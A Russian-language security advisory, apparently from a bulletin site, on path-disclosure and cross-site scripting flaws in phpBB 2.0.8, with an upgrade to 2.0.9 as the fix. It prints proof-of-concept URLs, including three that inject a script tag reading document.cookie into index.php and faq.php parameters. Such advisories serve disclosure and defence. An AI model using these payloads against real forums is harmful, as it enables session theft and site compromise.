Несколько уязвимостей в phpBB
| Дата публикации: | 18.07.2004 |
| Дата изменения: | 20.10.2006 |
| Всего просмотров: | 3985 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: phpBB 2.0.8
Описание: Несколько уязвимостей в phpBB позволяют удаленному пользователю определить инсталляционный путь и выполнить XSS нападение. 1. Раскрытие пути: http://localhost/phpbb208/index.php?category_rows=waraxe http://localhost/phpbb208/faq.php?faq=w araxe http://localhost/phpbb208/faq.php?mode=bbcode&faq=waraxe http://localhost/phpbb208/profile.php?mode=viewprofile&u=2&ranksrow=waraxe http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1 <pre> 2. XSS: <pre> B1 - XSS in "index.php": http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1 &category_rows[0][cat_title]=waraxe<script>alert(document.cookie); </script>&category_rows[0][cat_order]=99 B2 - XSS in "language\lang_english\lang_faq.php": http://localhost/phpbb208/faq.php? faq[0][0]=f00<script>alert(document.cookie);</script>bar& faq[0][1]=waraxe B3 - XSS in "language\lang_english\lang_bbcode.php ": http://localhost/phpbb208/faq.php?mode=bbcode& faq[0][0]=f00<script>alert(document.cookie);</script>bar &faq[0][1]=waraxe URL производителя: http://www.phpbb.com/ Решение:Установите последнюю версию форума (2.0.9): http://www.phpbb.com/downloads.php |
|
| Ссылки: | XSS and path full path disclosure in PhpBB |